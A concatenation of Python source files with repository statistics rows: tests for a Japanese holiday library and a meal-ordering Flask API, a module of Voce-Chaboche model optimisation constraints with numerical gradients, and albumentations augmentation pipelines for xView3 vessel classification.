self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2020), 22)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2021), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2022), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2023), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2024), 22)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2025), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2026), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2027), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2028), 22)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2029), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2030), 23)
def test_other_holiday(self):
self.assertEqual(jpholiday.is_holiday_name(datetime.date(1959, 4, 10)), '皇太子・明仁親王の結婚の儀')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(1989, 2, 24)), '昭和天皇の大喪の礼')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(1990, 11, 12)), '即位の礼正殿の儀')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(1993, 6, 9)), '皇太子・皇太子徳仁親王の結婚の儀')
| 63.194915
| 98
| 0.750034
| 833
| 7,457
| 6.446579
| 0.120048
| 0.198324
| 0.317318
| 0.357914
| 0.850093
| 0.845065
| 0.836499
| 0.836499
| 0.776536
| 0.050279
| 0
| 0.070577
| 0.144964
| 7,457
| 117
| 99
| 63.735043
| 0.77133
| 0.006169
| 0
| 0.021739
| 0
| 0
| 0.008449
| 0
| 0
| 0
| 0
| 0
| 0.771739
| 1
| 0.076087
| false
| 0
| 0.043478
| 0.01087
| 0.184783
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5d214d72b1c6a38180b59ebfa2843fd1ca9144bb
| 5,957
|
py
|
Python
|
tests/test_v1/test_orders.py
|
matthewacha/BookAMeal
|
6af638a4cf71d72dd2a5fa80ba0e908b7ef70cf5
|
[
"MIT"
] | null | null | null |
tests/test_v1/test_orders.py
|
matthewacha/BookAMeal
|
6af638a4cf71d72dd2a5fa80ba0e908b7ef70cf5
|
[
"MIT"
] | null | null | null |
tests/test_v1/test_orders.py
|
matthewacha/BookAMeal
|
6af638a4cf71d72dd2a5fa80ba0e908b7ef70cf5
|
[
"MIT"
] | 1
|
2018-08-20T11:57:23.000Z
|
2018-08-20T11:57:23.000Z
|
import unittest
import json
from app import APP
def login(tester):
tester.post('api/v1/auth/signup',content_type='application/json',
data =json.dumps( dict(email='men@gmail.com',
password='lantern')))
login = tester.post('api/v1/auth/login',content_type='application/json',
data =json.dumps( dict(email='men@gmail.com',
password='lantern')))
result = json.loads(login.data.decode())
return result
def add_meal(tester, result):
tester.post('/api/v1/meals/', content_type='application/json',
data =json.dumps( dict(name='Fries',
price=5000)),
headers =dict(access_token = result['token']))
tester.post('/api/v1/meals/', content_type='application/json',
data =json.dumps( dict(name='Beans',
price=5000)),
headers =dict(access_token = result['token']))
response=tester.post('/api/v1/meals/', content_type='application/json',
data =json.dumps( dict(name='Chicken',
price=15000)),
headers =dict(access_token = result['token']))
return response
class TestOrders(unittest.TestCase):
def setUp(self):
self.tester = APP.test_client(self)
def test_make_order(self):
"""test that a customer can make an order"""
result=login(self.tester)
add_meal(self.tester,result)
"""post to day's menu"""
self.tester.post('/api/v1/menu/1',
headers =dict(access_token = result['token']))
self.tester.post('/api/v1/menu/2',
headers =dict(access_token = result['token']))
#make an order
self.tester.post('/api/v1/orders/1',
headers =dict(access_token = result['token']))
response=self.tester.post('/api/v1/orders/2',
headers =dict(access_token = result['token']))
self.assertIn(u"Successfully placed order", response.data)
def test_fail_make_order(self):
"""test that a customer cannot make an order"""
result=login(self.tester)
add_meal(self.tester,result)
"""post to day's menu"""
self.tester.post('/api/v1/menu/1',
headers =dict(access_token = result['token']))
self.tester.post('/api/v1/menu/2',
headers =dict(access_token = result['token']))
#make an order
self.tester.post('/api/v1/orders/1',
headers =dict(access_token = result['token']))
response=self.tester.post('/api/v1/orders/4',
headers =dict(access_token = result['token']))
self.assertIn(u"Not successful, try again", response.data)
def test_get_all_orders(self):
"""test that a customer can get all orders from menu"""
result=login(self.tester)
add_meal(self.tester,result)
#add meals to menu
self.tester.post('/api/v1/menu/3',
headers =dict(access_token = result['token']))
self.tester.post('/api/v1/menu/2',
headers =dict(access_token = result['token']))
self.tester.post('/api/v1/orders/3',
headers =dict(access_token = result['token']))
#orders
self.tester.post('/api/v1/orders/2',
headers =dict(access_token = result['token']))
responsev=self.tester.get('/api/v1/orders',
headers =dict(access_token = result['token']))
self.assertIn(u"Beans", responsev.data)
def test_delete_orders(self):
"""tests that an order can be deleted"""
result=login(self.tester)
add_meal(self.tester,result)
#add meals to menu
self.tester.post('/api/v1/menu/3',
headers =dict(access_token = result['token']))
self.tester.post('/api/v1/menu/2',
headers =dict(access_token = result['token']))
self.tester.post('/api/v1/orders/3',
headers =dict(access_token = result['token']))
#orders
self.tester.post('/api/v1/orders/2',
headers =dict(access_token = result['token']))
responsev=self.tester.delete('/api/v1/orders/2',
headers =dict(access_token = result['token']))
self.assertIn(u"Successfully deleted", responsev.data)
def test_fail_delete_orders(self):
"""tests that an order can be deleted"""
result=login(self.tester)
add_meal(self.tester,result)
#add meals to menu
self.tester.post('/api/v1/menu/3',
headers =dict(access_token = result['token']))
self.tester.post('/api/v1/menu/2',
headers =dict(access_token = result['token']))
self.tester.post('/api/v1/orders/3',
headers =dict(access_token = result['token']))
#orders
self.tester.post('/api/v1/orders/2',
headers =dict(access_token = result['token']))
responsev=self.tester.delete('/api/v1/orders/5',
headers =dict(access_token = result['token']))
self.assertIn(u"Order does not exist", responsev.data)
if __name__=="__main__":
unittest.main()#pragma:no cover
| 43.481752
| 80
| 0.512674
| 644
| 5,957
| 4.650621
| 0.141304
| 0.113523
| 0.147579
| 0.190985
| 0.832721
| 0.820033
| 0.8
| 0.777295
| 0.749249
| 0.703172
| 0
| 0.016406
| 0.35538
| 5,957
| 136
| 81
| 43.801471
| 0.763542
| 0.052711
| 0
| 0.639175
| 0
| 0
| 0.1426
| 0
| 0
| 0
| 0
| 0
| 0.051546
| 1
| 0.082474
| false
| 0.020619
| 0.030928
| 0
| 0.14433
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d281d9a6af3b46a5276e67f16465bbf555e1e75
| 10,452
|
py
|
Python
|
RESSPyLab/vc_li_opt_constraints.py
|
ioannis-vm/RESSPyLab
|
306fc24d5f8ece8f2f2de274b56b80ba2019f605
|
[
"MIT"
] | 7
|
2019-10-15T09:16:41.000Z
|
2021-09-24T11:28:45.000Z
|
RESSPyLab/vc_li_opt_constraints.py
|
ioannis-vm/RESSPyLab
|
306fc24d5f8ece8f2f2de274b56b80ba2019f605
|
[
"MIT"
] | 3
|
2020-10-22T14:27:22.000Z
|
2021-11-15T17:46:49.000Z
|
RESSPyLab/vc_li_opt_constraints.py
|
ioannis-vm/RESSPyLab
|
306fc24d5f8ece8f2f2de274b56b80ba2019f605
|
[
"MIT"
] | 6
|
2019-07-22T05:47:10.000Z
|
2021-10-24T02:06:26.000Z
|
"""@package sqp_linsearch
Constraints on the original Voce-Chaboche model for limited information optimization.
"""
from numdifftools import nd_algopy as nda
import numpy as np
def g3_vco_upper(x, constants, variables):
""" Constraint on the maximum ratio of stress at saturation to initial yield stress for the original VC model.
:param np.ndarray x: Parameters of original Voce-Chaboche model.
:param dict constants: Defines the constants for the constraint.
:param dict variables: Defines constraint values that depend on x.
:return float: Value of the constraint in standard form.
"""
max_hardening_to_yield = constants['rho_yield_sup']
n_backstresses = int((len(x) - 4) / 2)
sy0 = x[1]
q_inf = x[2]
sum_ck_gammak = 0.
for i in range(n_backstresses):
c_ind = 4 + 2 * i
gamma_ind = 5 + 2 * i
sum_ck_gammak += x[c_ind] / x[gamma_ind]
return (sy0 + q_inf + sum_ck_gammak) / sy0 - max_hardening_to_yield
def g3_vco_lower(x, constants, variables):
""" Constraint on the minimum ratio of stress at saturation to initial yield stress for the original VC model.
:param np.ndarray x: Parameters of original Voce-Chaboche model.
:param dict constants: Defines the constants for the constraint.
:param dict variables: Defines constraint values that depend on x.
:return float: Value of the constraint in standard form.
"""
min_hardening_to_yield = constants['rho_yield_inf']
n_backstresses = int((len(x) - 4) / 2)
sy0 = x[1]
q_inf = x[2]
sum_ck_gammak = 0.
for i in range(n_backstresses):
c_ind = 4 + 2 * i
gamma_ind = 5 + 2 * i
sum_ck_gammak += x[c_ind] / x[gamma_ind]
return -(sy0 + q_inf + sum_ck_gammak) / sy0 + min_hardening_to_yield
def g4_vco_upper(x, constants, variables):
""" Constraint on the maximum ratio of isotropic to combined isotropic/kinematic hardening at saturation for the
original VC model.
:param np.ndarray x: Parameters of original Voce-Chaboche model.
:param dict constants: Defines the constants for the constraint.
:param dict variables: Defines constraint values that depend on x.
:return float: Value of the constraint in standard form.
"""
iso_kin_ratio_max = constants['rho_iso_sup']
q_inf = x[2]
n_backstresses = int((len(x) - 4) / 2)
sum_ck_gammak = 0.
for i in range(n_backstresses):
c_ind = 4 + 2 * i
gamma_ind = 5 + 2 * i
sum_ck_gammak += x[c_ind] / x[gamma_ind]
return q_inf / (q_inf + sum_ck_gammak) - iso_kin_ratio_max
def g4_vco_lower(x, constants, variables):
""" Constraint on the minimum ratio of isotropic to combined isotropic/kinematic hardening at saturation for the
original VC model.
:param np.ndarray x: Parameters of original Voce-Chaboche model.
:param dict constants: Defines the constants for the constraint.
:param dict variables: Defines constraint values that depend on x.
:return float: Value of the constraint in standard form.
"""
iso_kin_ratio_min = constants['rho_iso_inf']
q_inf = x[2]
n_backstresses = int((len(x) - 4) / 2)
sum_ck_gammak = 0.
for i in range(n_backstresses):
c_ind = 4 + 2 * i
gamma_ind = 5 + 2 * i
sum_ck_gammak += x[c_ind] / x[gamma_ind]
return -q_inf / (q_inf + sum_ck_gammak) + iso_kin_ratio_min
def g5_vco_lower(x, constants, variables):
""" Constraint on the lower bound ratio of gamma_1 to b for the original VC model.
:param np.ndarray x: Parameters of original Voce-Chaboche model.
:param dict constants: Defines the constants for the constraint.
:param dict variables: Defines constraint values that depend on x.
:return float: Value of the constraint in standard form.
"""
b = x[3]
gamma1 = x[5]
gamma_b_ratio_min = constants['rho_gamma_inf']
return -gamma1 / b + gamma_b_ratio_min
def g5_vco_upper(x, constants, variables):
""" Constraint on the upper bound ratio of gamma_1 to b for the original VC model.
:param np.ndarray x: Parameters of original Voce-Chaboche model.
:param dict constants: Defines the constants for the constraint.
:param dict variables: Defines constraint values that depend on x.
:return float: Value of the constraint in standard form.
"""
b = x[3]
gamma1 = x[5]
gamma_b_ratio_max = constants['rho_gamma_sup']
return gamma1 / b - gamma_b_ratio_max
def g6_vco_lower(x, constants, variables):
""" Constraint on the lower bound ratio of gamma_1 to gamma_2 for the original VC model.
gamma_1 is always x[5] and gamma_2 is always x[7].
:param np.ndarray x: Parameters of original Voce-Chaboche model.
:param dict constants: Defines the constants for the constraint.
:param dict variables: Defines constraint values that depend on x.
:return float: Value of the constraint in standard form.
"""
gamma1 = x[5]
gamma2 = x[7]
gamma_1_2_ratio_min = constants['rho_gamma_12_inf']
return -gamma1 / gamma2 + gamma_1_2_ratio_min
def g6_vco_upper(x, constants, variables):
""" Constraint on the upper bound ratio of gamma_1 to gamma_2 for the original VC model.
gamma_1 is always x[5] and gamma_2 is always x[7].
:param np.ndarray x: Parameters of original Voce-Chaboche model.
:param dict constants: Defines the constants for the constraint.
:param dict variables: Defines constraint values that depend on x.
:return float: Value of the constraint in standard form.
"""
gamma1 = x[5]
gamma2 = x[7]
gamma_1_2_ratio_max = constants['rho_gamma_12_sup']
return gamma1 / gamma2 - gamma_1_2_ratio_max
def g_kin_ratio_vco_lower(x, constants, variables):
c1 = x[4]
gamma1 = x[5]
c2 = x[6]
gamma2 = x[7]
gamma_kin_ratio_min = constants['rho_kin_ratio_inf']
return -(c1 / gamma1) / (c2 / gamma2) + gamma_kin_ratio_min
def g_kin_ratio_vco_upper(x, constants, variables):
c1 = x[4]
gamma1 = x[5]
c2 = x[6]
gamma2 = x[7]
gamma_kin_ratio_max = constants['rho_kin_ratio_sup']
return (c1 / gamma1) / (c2 / gamma2) - gamma_kin_ratio_max
# Gradients and Hessians of all the above constraints
def g3_vco_lower_gradient(x, constants, variables):
fun_wrapper = lambda x1: g3_vco_lower(x1, constants, variables)
grad_fun = nda.Gradient(fun_wrapper)
grad = grad_fun(x)
return np.reshape(grad, (-1, 1))
def g3_vco_upper_gradient(x, constants, variables):
fun_wrapper = lambda x1: g3_vco_upper(x1, constants, variables)
grad_fun = nda.Gradient(fun_wrapper)
grad = grad_fun(x)
return np.reshape(grad, (-1, 1))
def g4_vco_lower_gradient(x, constants, variables):
fun_wrapper = lambda x1: g4_vco_lower(x1, constants, variables)
grad_fun = nda.Gradient(fun_wrapper)
grad = grad_fun(x)
return np.reshape(grad, (-1, 1))
def g4_vco_upper_gradient(x, constants, variables):
fun_wrapper = lambda x1: g4_vco_upper(x1, constants, variables)
grad_fun = nda.Gradient(fun_wrapper)
grad = grad_fun(x)
return np.reshape(grad, (-1, 1))
def g5_vco_lower_gradient(x, constants, variables):
fun_wrapper = lambda x1: g5_vco_lower(x1, constants, variables)
grad_fun = nda.Gradient(fun_wrapper)
grad = grad_fun(x)
return np.reshape(grad, (-1, 1))
def g5_vco_upper_gradient(x, constants, variables):
fun_wrapper = lambda x1: g5_vco_upper(x1, constants, variables)
grad_fun = nda.Gradient(fun_wrapper)
grad = grad_fun(x)
return np.reshape(grad, (-1, 1))
def g6_vco_lower_gradient(x, constants, variables):
fun_wrapper = lambda x1: g6_vco_lower(x1, constants, variables)
grad_fun = nda.Gradient(fun_wrapper)
grad = grad_fun(x)
return grad
def g6_vco_upper_gradient(x, constants, variables):
fun_wrapper = lambda x1: g6_vco_upper(x1, constants, variables)
grad_fun = nda.Gradient(fun_wrapper)
grad = grad_fun(x)
return grad
def g_kin_ratio_vco_lower_gradient(x, constants, variables):
fun_wrapper = lambda x1: g_kin_ratio_vco_lower(x1, constants, variables)
grad_fun = nda.Gradient(fun_wrapper)
grad = grad_fun(x)
return grad
def g_kin_ratio_vco_upper_gradient(x, constants, variables):
fun_wrapper = lambda x1: g_kin_ratio_vco_upper(x1, constants, variables)
grad_fun = nda.Gradient(fun_wrapper)
grad = grad_fun(x)
return grad
# Hessians
def g3_vco_lower_hessian(x, constants, variables):
fun_wrapper = lambda x1: g3_vco_lower(x1, constants, variables)
hess_fun = nda.Hessian(fun_wrapper)
hess = hess_fun(x)
return hess
def g3_vco_upper_hessian(x, constants, variables):
fun_wrapper = lambda x1: g3_vco_upper(x1, constants, variables)
hess_fun = nda.Hessian(fun_wrapper)
hess = hess_fun(x)
return hess
def g4_vco_lower_hessian(x, constants, variables):
fun_wrapper = lambda x1: g4_vco_lower(x1, constants, variables)
hess_fun = nda.Hessian(fun_wrapper)
hess = hess_fun(x)
return hess
def g4_vco_upper_hessian(x, constants, variables):
fun_wrapper = lambda x1: g4_vco_upper(x1, constants, variables)
hess_fun = nda.Hessian(fun_wrapper)
hess = hess_fun(x)
return hess
def g5_vco_lower_hessian(x, constants, variables):
fun_wrapper = lambda x1: g5_vco_lower(x1, constants, variables)
hess_fun = nda.Hessian(fun_wrapper)
hess = hess_fun(x)
return hess
def g5_vco_upper_hessian(x, constants, variables):
fun_wrapper = lambda x1: g5_vco_upper(x1, constants, variables)
hess_fun = nda.Hessian(fun_wrapper)
hess = hess_fun(x)
return hess
def g6_vco_lower_hessian(x, constants, variables):
fun_wrapper = lambda x1: g6_vco_lower(x1, constants, variables)
hess_fun = nda.Hessian(fun_wrapper)
hess = hess_fun(x)
return hess
def g6_vco_upper_hessian(x, constants, variables):
fun_wrapper = lambda x1: g6_vco_upper(x1, constants, variables)
hess_fun = nda.Hessian(fun_wrapper)
hess = hess_fun(x)
return hess
def g_kin_ratio_vco_lower_hessian(x, constants, variables):
fun_wrapper = lambda x1: g_kin_ratio_vco_lower(x1, constants, variables)
hess_fun = nda.Hessian(fun_wrapper)
hess = hess_fun(x)
return hess
def g_kin_ratio_vco_upper_hessian(x, constants, variables):
fun_wrapper = lambda x1: g_kin_ratio_vco_upper(x1, constants, variables)
hess_fun = nda.Hessian(fun_wrapper)
hess = hess_fun(x)
return hess
| 34.045603
| 116
| 0.706946
| 1,614
| 10,452
| 4.343866
| 0.072491
| 0.12837
| 0.081301
| 0.062759
| 0.949365
| 0.926259
| 0.904293
| 0.895735
| 0.885751
| 0.885751
| 0
| 0.024299
| 0.20465
| 10,452
| 306
| 117
| 34.156863
| 0.819079
| 0.297742
| 0
| 0.707865
| 0
| 0
| 0.019718
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.168539
| false
| 0
| 0.011236
| 0
| 0.348315
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d3ff607d5b3958835bd47f3f3c2531f8a4e249f
| 14,953
|
py
|
Python
|
xd/xview3/vessel_class/augmentation.py
|
smly/xview3-kohei-solution
|
f6933ff437240c6c07fd61c3bd4290b639d17531
|
[
"MIT"
] | 2
|
2022-01-14T08:00:34.000Z
|
2022-01-17T12:42:44.000Z
|
xd/xview3/vessel_class/augmentation.py
|
smly/xview3-kohei-solution
|
f6933ff437240c6c07fd61c3bd4290b639d17531
|
[
"MIT"
] | null | null | null |
xd/xview3/vessel_class/augmentation.py
|
smly/xview3-kohei-solution
|
f6933ff437240c6c07fd61c3bd4290b639d17531
|
[
"MIT"
] | 1
|
2022-01-31T21:25:21.000Z
|
2022-01-31T21:25:21.000Z
|
import albumentations as albu
def get_xview3_augv3(**kwargs):
train_transform = albu.Compose(
[
albu.RandomRotate90(p=0.3),
albu.HorizontalFlip(p=0.3),
albu.OneOf(
[
albu.RandomBrightnessContrast(0.1, p=1),
albu.RandomGamma(p=1),
],
p=0.3,
),
albu.Rotate(
p=0.3,
limit=(-90, 90),
interpolation=0,
border_mode=0,
value=(0, 0, 0),
mask_value=None,
),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
val_transform = albu.Compose(
[
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
return train_transform, val_transform
def get_xview3_augv3_centercrop64(**kwargs):
train_transform = albu.Compose(
[
albu.RandomRotate90(p=0.3),
albu.HorizontalFlip(p=0.3),
albu.OneOf(
[
albu.RandomBrightnessContrast(0.1, p=1),
albu.RandomGamma(p=1),
],
p=0.3,
),
albu.Rotate(
p=0.3,
limit=(-90, 90),
interpolation=0,
border_mode=0,
value=(0, 0, 0),
mask_value=None,
),
albu.CenterCrop(64, 64, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
val_transform = albu.Compose(
[
albu.CenterCrop(64, 64, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
return train_transform, val_transform
def get_xview3_augv3_centercrop92(**kwargs):
train_transform = albu.Compose(
[
albu.RandomRotate90(p=0.3),
albu.HorizontalFlip(p=0.3),
albu.OneOf(
[
albu.RandomBrightnessContrast(0.1, p=1),
albu.RandomGamma(p=1),
],
p=0.3,
),
albu.Rotate(
p=0.3,
limit=(-90, 90),
interpolation=0,
border_mode=0,
value=(0, 0, 0),
mask_value=None,
),
albu.CenterCrop(92, 92, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
val_transform = albu.Compose(
[
albu.CenterCrop(64, 64, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
return train_transform, val_transform
def get_xview3_augv4_crop64(**kwargs):
train_transform = albu.Compose(
[
albu.RandomRotate90(p=0.3),
albu.HorizontalFlip(p=0.3),
albu.OneOf(
[
albu.RandomBrightnessContrast(0.1, p=1),
albu.RandomGamma(p=1),
],
p=0.3,
),
albu.Rotate(
p=0.3,
limit=(-90, 90),
interpolation=0,
border_mode=0,
value=(0, 0, 0),
mask_value=None,
),
albu.CenterCrop(64, 64, p=1.0),
albu.CoarseDropout(
p=0.3,
min_holes=2,
max_holes=6,
max_height=6,
max_width=6,
min_height=2,
min_width=2,
mask_fill_value=0,
),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
val_transform = albu.Compose(
[
albu.CenterCrop(64, 64, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
return train_transform, val_transform
def get_xview3_augv5_centercrop64(**kwargs):
train_transform = albu.Compose(
[
albu.RandomRotate90(p=0.3),
albu.HorizontalFlip(p=0.3),
albu.Rotate(
p=0.3,
limit=(-90, 90),
interpolation=0,
border_mode=0,
value=(0, 0, 0),
mask_value=(0, 0, 0),
),
albu.CenterCrop(64, 64, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
val_transform = albu.Compose(
[
albu.CenterCrop(64, 64, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
return train_transform, val_transform
def augv6_crop128(**kwargs):
train_transform = albu.Compose(
[
albu.RandomRotate90(p=0.3),
albu.HorizontalFlip(p=0.3),
albu.OneOf(
[
albu.RandomBrightnessContrast(0.1, p=1),
albu.RandomGamma(p=1),
],
p=0.3,
),
albu.Rotate(
p=0.3,
limit=(-90, 90),
interpolation=0,
border_mode=0,
value=(0, 0, 0),
mask_value=None,
),
albu.CenterCrop(128, 128, p=1.0),
albu.CoarseDropout(
p=0.1,
min_holes=2,
max_holes=6,
max_height=12,
max_width=12,
min_height=4,
min_width=4,
mask_fill_value=0,
),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
val_transform = albu.Compose(
[
albu.CenterCrop(128, 128, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
return train_transform, val_transform
def augv7(**kwargs):
train_transform = albu.Compose(
[
albu.RandomRotate90(p=0.3),
albu.HorizontalFlip(p=0.3),
albu.OneOf(
[
albu.RandomBrightnessContrast(0.1, p=1),
albu.RandomGamma(p=1),
],
p=0.3,
),
albu.Rotate(
p=0.3,
limit=(-90, 90),
interpolation=0,
border_mode=0,
value=(0, 0, 0),
mask_value=None,
),
# albu.CenterCrop(128, 128, p=1.0),
albu.CoarseDropout(
p=0.1,
min_holes=2,
max_holes=6,
max_height=12,
max_width=12,
min_height=4,
min_width=4,
mask_fill_value=0,
),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
val_transform = albu.Compose(
[
# albu.CenterCrop(128, 128, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
return train_transform, val_transform
def augv7_crop64(**kwargs):
train_transform = albu.Compose(
[
albu.RandomRotate90(p=0.3),
albu.HorizontalFlip(p=0.3),
albu.OneOf(
[
albu.RandomBrightnessContrast(0.1, p=1),
albu.RandomGamma(p=1),
],
p=0.3,
),
albu.Rotate(
p=0.3,
limit=(-90, 90),
interpolation=0,
border_mode=0,
value=(0, 0, 0),
mask_value=None,
),
# albu.CenterCrop(128, 128, p=1.0),
albu.CoarseDropout(
p=0.1,
min_holes=2,
max_holes=6,
max_height=12,
max_width=12,
min_height=4,
min_width=4,
mask_fill_value=0,
),
albu.CenterCrop(64, 64, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
val_transform = albu.Compose(
[
albu.CenterCrop(64, 64, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
return train_transform, val_transform
def augv7_crop128(**kwargs):
train_transform = albu.Compose(
[
albu.RandomRotate90(p=0.3),
albu.HorizontalFlip(p=0.3),
albu.OneOf(
[
albu.RandomBrightnessContrast(0.1, p=1),
albu.RandomGamma(p=1),
],
p=0.3,
),
albu.Rotate(
p=0.3,
limit=(-90, 90),
interpolation=0,
border_mode=0,
value=(0, 0, 0),
mask_value=None,
),
# albu.CenterCrop(128, 128, p=1.0),
albu.CoarseDropout(
p=0.1,
min_holes=2,
max_holes=6,
max_height=12,
max_width=12,
min_height=4,
min_width=4,
mask_fill_value=0,
),
albu.CenterCrop(128, 128, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
val_transform = albu.Compose(
[
albu.CenterCrop(128, 128, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
return train_transform, val_transform
def augv8_crop128(**kwargs):
train_transform = albu.Compose(
[
albu.RandomRotate90(p=0.3),
albu.HorizontalFlip(p=0.3),
albu.OneOf(
[
albu.RandomBrightnessContrast(0.1, p=1),
albu.RandomGamma(p=1),
],
p=0.3,
),
albu.Rotate(
p=0.3,
limit=(-90, 90),
interpolation=0,
border_mode=0,
value=(0, 0, 0),
mask_value=None,
),
albu.CenterCrop(128, 128, p=1.0),
albu.CoarseDropout(
p=0.1,
min_holes=2,
max_holes=6,
max_height=12,
max_width=12,
min_height=4,
min_width=4,
mask_fill_value=0,
),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
val_transform = albu.Compose(
[
# albu.CenterCrop(128, 128, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
return train_transform, val_transform
def augv9_crop128(**kwargs):
train_transform = albu.Compose(
[
albu.RandomRotate90(p=0.3),
albu.HorizontalFlip(p=0.3),
albu.OneOf(
[
albu.RandomBrightnessContrast(0.1, p=1),
albu.RandomGamma(p=1),
],
p=0.3,
),
albu.Rotate(
p=0.3,
limit=(-90, 90),
interpolation=0,
border_mode=0,
value=(0, 0, 0),
mask_value=None,
),
albu.CenterCrop(128, 128, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
val_transform = albu.Compose(
[
albu.CenterCrop(128, 128, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
return train_transform, val_transform
def augv10_crop128(**kwargs):
train_transform = albu.Compose(
[
albu.RandomRotate90(p=0.3),
albu.HorizontalFlip(p=0.3),
albu.OneOf(
[
albu.RandomBrightnessContrast(0.1, p=1),
albu.RandomGamma(p=1),
],
p=0.3,
),
albu.CenterCrop(128, 128, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
val_transform = albu.Compose(
[
albu.CenterCrop(128, 128, p=1.0),
albu.Normalize(
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225),
max_pixel_value=255.0,
),
]
)
return train_transform, val_transform
| 27.742115
| 60
| 0.397044
| 1,557
| 14,953
| 3.693642
| 0.044316
| 0.018084
| 0.024517
| 0.042601
| 0.978786
| 0.978786
| 0.978786
| 0.976178
| 0.971483
| 0.971483
| 0
| 0.156698
| 0.482311
| 14,953
| 538
| 61
| 27.79368
| 0.586229
| 0.011302
| 0
| 0.799607
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023576
| false
| 0
| 0.001965
| 0
| 0.049116
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
